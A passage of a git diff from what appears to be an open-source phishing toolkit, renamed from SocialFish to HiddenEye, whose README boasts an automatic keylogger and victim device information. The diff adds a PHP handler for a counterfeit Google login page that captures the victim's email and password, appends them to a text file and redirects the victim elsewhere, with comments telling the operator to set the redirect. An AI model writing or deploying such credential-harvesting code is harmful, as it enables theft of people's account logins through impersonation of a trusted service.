- AN ADVANCED PHISHING TOOL WITH MULTIPLE FUNCTIONALITY
- [ Automatic keylogger, Victim Device info , Many Pages ]
+ Modern phishing tool with advanced functionality
-The use of the SocialFish is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.
+The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
@@ -294,8 +296,5 @@ If you liked the work and want to support us all, you can donate :D
Bitcoin Address: qpuwdfv3p3gpufzctjapp0dp9z4kkk9x6cgl2hhghe
-### VIDEO DEMO
-
\ No newline at end of file
diff --git a/WebPages/google_standard/login.php b/WebPages/google_standard/login.php
index 5d99e3e..e71bef0 100644
--- a/WebPages/google_standard/login.php
+++ b/WebPages/google_standard/login.php
@@ -1,6 +1,22 @@
');
-exit();
+ session_start();
+
+ $pass = $_POST["password"];
+ $email=$_SESSION["Email"];
+ //opening logins text file for appending new data.
+ $file = fopen("usernames.txt", "a") or die("Unable to open file!");
+
+ //Writing email and password to logins.txt.
+ fwrite($file, "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass .FILE_APPEND);
+ fclose($file);//closing logins.txt.
+
+ //redirecting user to the google drive's locations where the game is available to download.
+ //change the location url to redirect to a website of your choice.
+ header('Location: ');
+ exit();
+
+
+ session_destroy();
+
+?>
diff --git a/_config.yml b/_config.yml
index 3397c9a..c50ff38 100644
--- a/_config.yml
+++ b/_config.yml
@@ -1 +1 @@
-theme: jekyll-theme-architect
\ No newline at end of file
+theme: jekyll-theme-merlot
\ No newline at end of file
diff --git a/logo.png b/logo.png
new file mode 100644
index 0000000..b1d5615
Binary files /dev/null and b/logo.png differ
diff --git a/social.png b/social.png
deleted file mode 100644
index 43ceb51..0000000
Binary files a/social.png and /dev/null differ
diff --git a/video.png b/video.png
deleted file mode 100644
index 4d0b3eb..0000000
Binary files a/video.png and /dev/null differ